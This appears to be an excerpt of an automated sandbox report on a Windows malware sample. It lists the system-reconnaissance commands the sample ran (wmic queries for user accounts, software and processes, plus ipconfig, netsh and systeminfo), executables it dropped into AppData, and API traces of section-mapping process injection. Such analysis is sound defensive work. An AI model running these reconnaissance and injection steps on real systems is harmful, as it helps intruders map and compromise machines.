                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:21
                                                                                          Start time:17:28:50
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                                                                                          Imagebase:0x7ff72e630000
                                                                                          File size:576'000 bytes
                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:22
                                                                                          Start time:17:28:52
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                                                                                          Imagebase:0x7ff72e630000
                                                                                          File size:576'000 bytes
                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:23
                                                                                          Start time:17:28:55
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                                                                                          Imagebase:0x7ff72e630000
                                                                                          File size:576'000 bytes
                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:24
                                                                                          Start time:17:28:57
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                                                                                          Imagebase:0x7ff72e630000
                                                                                          File size:576'000 bytes
                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:25
                                                                                          Start time:17:28:59
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                                                                                          Imagebase:0x7ff72e630000
                                                                                          File size:576'000 bytes
                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:26
                                                                                          Start time:17:29:01
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                                                                                          Imagebase:0x7ff72e630000
                                                                                          File size:576'000 bytes
                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:27
                                                                                          Start time:17:29:06
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                                                                                          Imagebase:0x7ff72e630000
                                                                                          File size:576'000 bytes
                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:28
                                                                                          Start time:17:29:09
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                                                                                          Imagebase:0x7ff72e630000
                                                                                          File size:576'000 bytes
                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:29
                                                                                          Start time:17:29:13
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                                                                                          Imagebase:0x7ff72e630000
                                                                                          File size:576'000 bytes
                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:30
                                                                                          Start time:17:29:15
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                                                                                          Imagebase:0x7ff72e630000
                                                                                          File size:576'000 bytes
                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:31
                                                                                          Start time:17:29:20
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                                                                                          Imagebase:0x7ff72e630000
                                                                                          File size:576'000 bytes
                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:32
                                                                                          Start time:17:29:21
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\ipconfig.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:ipconfig /displaydns
                                                                                          Imagebase:0x7ff7b0e20000
                                                                                          File size:35'840 bytes
                                                                                          MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:33
                                                                                          Start time:17:29:22
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\ROUTE.EXE
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:route print
                                                                                          Imagebase:0x7ff753ba0000
                                                                                          File size:24'576 bytes
                                                                                          MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:34
                                                                                          Start time:17:29:24
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:netsh firewall show state
                                                                                          Imagebase:0x7ff72c570000
                                                                                          File size:96'768 bytes
                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:35
                                                                                          Start time:17:29:24
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\systeminfo.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:systeminfo
                                                                                          Imagebase:0x7ff6261b0000
                                                                                          File size:110'080 bytes
                                                                                          MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:37
                                                                                          Start time:17:29:29
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:tasklist /v /fo csv
                                                                                          Imagebase:0x7ff611c30000
                                                                                          File size:106'496 bytes
                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:38
                                                                                          Start time:17:30:01
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Users\user\AppData\Roaming\dghchav
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Roaming\dghchav
                                                                                          Imagebase:0x400000
                                                                                          File size:397'824 bytes
                                                                                          MD5 hash:119C907F0839351B214BD51034B6F124
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:39
                                                                                          Start time:17:30:01
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Users\user\AppData\Roaming\eihchav
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Roaming\eihchav
                                                                                          Imagebase:0x400000
                                                                                          File size:396'800 bytes
                                                                                          MD5 hash:5D99D66EF42EC43AF05B9304AEBEFDB6
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:7.7%
                                                                                            Dynamic/Decrypted Code Coverage:40.7%
                                                                                            Signature Coverage:44.9%
                                                                                            Total number of Nodes:118
                                                                                            Total number of Limit Nodes:4
                                                                                            execution_graph 3479 402e40 3481 402e37 3479->3481 3482 402edf 3481->3482 3483 4018e6 3481->3483 3484 4018f5 3483->3484 3485 40192e Sleep 3484->3485 3486 401949 3485->3486 3488 40195a 3486->3488 3489 401514 3486->3489 3488->3482 3490 401524 3489->3490 3491 4015c4 NtDuplicateObject 3490->3491 3497 4016e0 3490->3497 3492 4015e1 NtCreateSection 3491->3492 3491->3497 3493 401661 NtCreateSection 3492->3493 3494 401607 NtMapViewOfSection 3492->3494 3496 40168d 3493->3496 3493->3497 3494->3493 3495 40162a NtMapViewOfSection 3494->3495 3495->3493 3498 401648 3495->3498 3496->3497 3499 401697 NtMapViewOfSection 3496->3499 3497->3488 3498->3493 3499->3497 3500 4016be NtMapViewOfSection 3499->3500 3500->3497 3596 401542 3597 40153b 3596->3597 3598 4015c4 NtDuplicateObject 3597->3598 3604 4016e0 3597->3604 3599 4015e1 NtCreateSection 3598->3599 3598->3604 3600 401661 NtCreateSection 3599->3600 3601 401607 NtMapViewOfSection 3599->3601 3603 40168d 3600->3603 3600->3604 3601->3600 3602 40162a NtMapViewOfSection 3601->3602 3602->3600 3605 401648 3602->3605 3603->3604 3606 401697 NtMapViewOfSection 3603->3606 3605->3600 3606->3604 3607 4016be NtMapViewOfSection 3606->3607 3607->3604 3501 620f66 3502 620f75 3501->3502 3505 621706 3502->3505 3506 621721 3505->3506 3507 62172a CreateToolhelp32Snapshot 3506->3507 3508 621746 Module32First 3506->3508 3507->3506 3507->3508 3509 621755 3508->3509 3510 620f7e 3508->3510 3512 6213c5 3509->3512 3513 6213f0 3512->3513 3514 621401 VirtualAlloc 3513->3514 3515 621439 3513->3515 3514->3515 3515->3515 3539 2090001 3540 2090005 3539->3540 3545 209092b GetPEB 3540->3545 3542 2090030 3547 209003c 3542->3547 3546 2090972 3545->3546 3546->3542 3548 2090049 3547->3548 3549 2090e0f 2 API calls 3548->3549 3550 2090223 3549->3550 3551 2090d90 GetPEB 3550->3551 3552 2090238 VirtualAlloc 3551->3552 3553 2090265 3552->3553 3554 20902ce VirtualProtect 3553->3554 3556 209030b 3554->3556 3555 2090439 VirtualFree 3559 20904be LoadLibraryA 3555->3559 3556->3555 3558 20908c7 3559->3558 3560 2090005 3561 209092b GetPEB 3560->3561 3562 2090030 3561->3562 3563 209003c 7 API calls 3562->3563 3564 2090038 3563->3564 3655 402dd0 3656 402ddc 3655->3656 3657 4018e6 8 API calls 3656->3657 3658 402edf 3656->3658 3657->3658 3577 4018f1 3578 4018f6 3577->3578 3579 40192e Sleep 3578->3579 3580 401949 3579->3580 3581 401514 7 API calls 3580->3581 3582 40195a 3580->3582 3581->3582 3516 209003c 3517 2090049 3516->3517 3529 2090e0f SetErrorMode SetErrorMode 3517->3529 3522 2090265 3523 20902ce VirtualProtect 3522->3523 3525 209030b 3523->3525 3524 2090439 VirtualFree 3528 20904be LoadLibraryA 3524->3528 3525->3524 3527 20908c7 3528->3527 3530 2090223 3529->3530 3531 2090d90 3530->3531 3532 2090dad 3531->3532 3533 2090dbb GetPEB 3532->3533 3534 2090238 VirtualAlloc 3532->3534 3533->3534 3534->3522 3642 401915 3643 40191a 3642->3643 3644 4018c6 3642->3644 3645 40192e Sleep 3643->3645 3646 401949 3645->3646 3647 401514 7 API calls 3646->3647 3648 40195a 3646->3648 3647->3648 3535 402f97 3536 402fc1 3535->3536 3537 4030ee 3535->3537 3536->3537 3538 40307c RtlCreateUserThread NtTerminateProcess 3536->3538 3538->3537 3632 402d7b 3635 402d38 3632->3635 3633 402dc7 3634 4018e6 8 API calls 3634->3633 3635->3632 3635->3633 3635->3634 3583 4014fe 3584 401531 3583->3584 3585 401506 3583->3585 3586 4015c4 NtDuplicateObject 3584->3586 3592 4016e0 3584->3592 3587 4015e1 NtCreateSection 3586->3587 3586->3592 3588 401661 NtCreateSection 3587->3588 3589 401607 NtMapViewOfSection 3587->3589 3591 40168d 3588->3591 3588->3592 3589->3588 3590 40162a NtMapViewOfSection 3589->3590 3590->3588 3593 401648 3590->3593 3591->3592 3594 401697 NtMapViewOfSection 3591->3594 3593->3588 3594->3592 3595 4016be NtMapViewOfSection 3594->3595 3595->3592

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 106 4018a5-4018b7 100->106 104 401595-4015be 101->104 105 401896 101->105 104->105 115 4015c4-4015db NtDuplicateObject 104->115 105->106 112 4018c5 106->112 113 4018bc-4018e3 call 401193 106->113 112->113 115->105 117 4015e1-401605 NtCreateSection 115->117 119 401661-401687 NtCreateSection 117->119 120 401607-401628 NtMapViewOfSection 117->120 119->105 122 40168d-401691 119->122 120->119 121 40162a-401646 NtMapViewOfSection 120->121 121->119 124 401648-40165e 121->124 122->105 125 401697-4016b8 NtMapViewOfSection 122->125 124->119 125->105 127 4016be-4016da NtMapViewOfSection 125->127 127->105 130 4016e0 call 4016e5 127->130
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                            • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                            • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                            • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 153 4018a5-4018b7 147->153 151 401595-4015be 148->151 152 401896 148->152 151->152 162 4015c4-4015db NtDuplicateObject 151->162 152->153 159 4018c5 153->159 160 4018bc-4018e3 call 401193 153->160 159->160 162->152 164 4015e1-401605 NtCreateSection 162->164 166 401661-401687 NtCreateSection 164->166 167 401607-401628 NtMapViewOfSection 164->167 166->152 169 40168d-401691 166->169 167->166 168 40162a-401646 NtMapViewOfSection 167->168 168->166 171 401648-40165e 168->171 169->152 172 401697-4016b8 NtMapViewOfSection 169->172 171->166 172->152 174 4016be-4016da NtMapViewOfSection 172->174 174->152 177 4016e0 call 4016e5 174->177
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$CreateDuplicateObjectView
                                                                                            • String ID:
                                                                                            • API String ID: 1652636561-0
                                                                                            • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                            • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                            • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                            • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 197 4018a5-4018b7 191->197 195 401595-4015be 192->195 196 401896 192->196 195->196 206 4015c4-4015db NtDuplicateObject 195->206 196->197 203 4018c5 197->203 204 4018bc-4018e3 call 401193 197->204 203->204 206->196 208 4015e1-401605 NtCreateSection 206->208 210 401661-401687 NtCreateSection 208->210 211 401607-401628 NtMapViewOfSection 208->211 210->196 213 40168d-401691 210->213 211->210 212 40162a-401646 NtMapViewOfSection 211->212 212->210 215 401648-40165e 212->215 213->196 216 401697-4016b8 NtMapViewOfSection 213->216 215->210 216->196 218 4016be-4016da NtMapViewOfSection 216->218 218->196 221 4016e0 call 4016e5 218->221
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                            • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                            • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                            • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 236 4018a5-4018b7 230->236 234 401595-4015be 231->234 235 401896 231->235 234->235 245 4015c4-4015db NtDuplicateObject 234->245 235->236 242 4018c5 236->242 243 4018bc-4018e3 call 401193 236->243 242->243 245->235 247 4015e1-401605 NtCreateSection 245->247 249 401661-401687 NtCreateSection 247->249 250 401607-401628 NtMapViewOfSection 247->250 249->235 252 40168d-401691 249->252 250->249 251 40162a-401646 NtMapViewOfSection 250->251 251->249 254 401648-40165e 251->254 252->235 255 401697-4016b8 NtMapViewOfSection 252->255 254->249 255->235 257 4016be-4016da NtMapViewOfSection 255->257 257->235 260 4016e0 call 4016e5 257->260
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                            • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                            • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                            • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 276 4018a5-4018b7 270->276 274 401595-4015be 271->274 275 401896 271->275 274->275 285 4015c4-4015db NtDuplicateObject 274->285 275->276 282 4018c5 276->282 283 4018bc-4018e3 call 401193 276->283 282->283 285->275 287 4015e1-401605 NtCreateSection 285->287 289 401661-401687 NtCreateSection 287->289 290 401607-401628 NtMapViewOfSection 287->290 289->275 292 40168d-401691 289->292 290->289 291 40162a-401646 NtMapViewOfSection 290->291 291->289 294 401648-40165e 291->294 292->275 295 401697-4016b8 NtMapViewOfSection 292->295 294->289 295->275 297 4016be-4016da NtMapViewOfSection 295->297 297->275 300 4016e0 call 4016e5 297->300
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                            • String ID:
                                                                                            • API String ID: 1546783058-0
                                                                                            • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                            • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                            • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                            • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                            • String ID:
                                                                                            • API String ID: 1921587553-0
                                                                                            • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                            • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
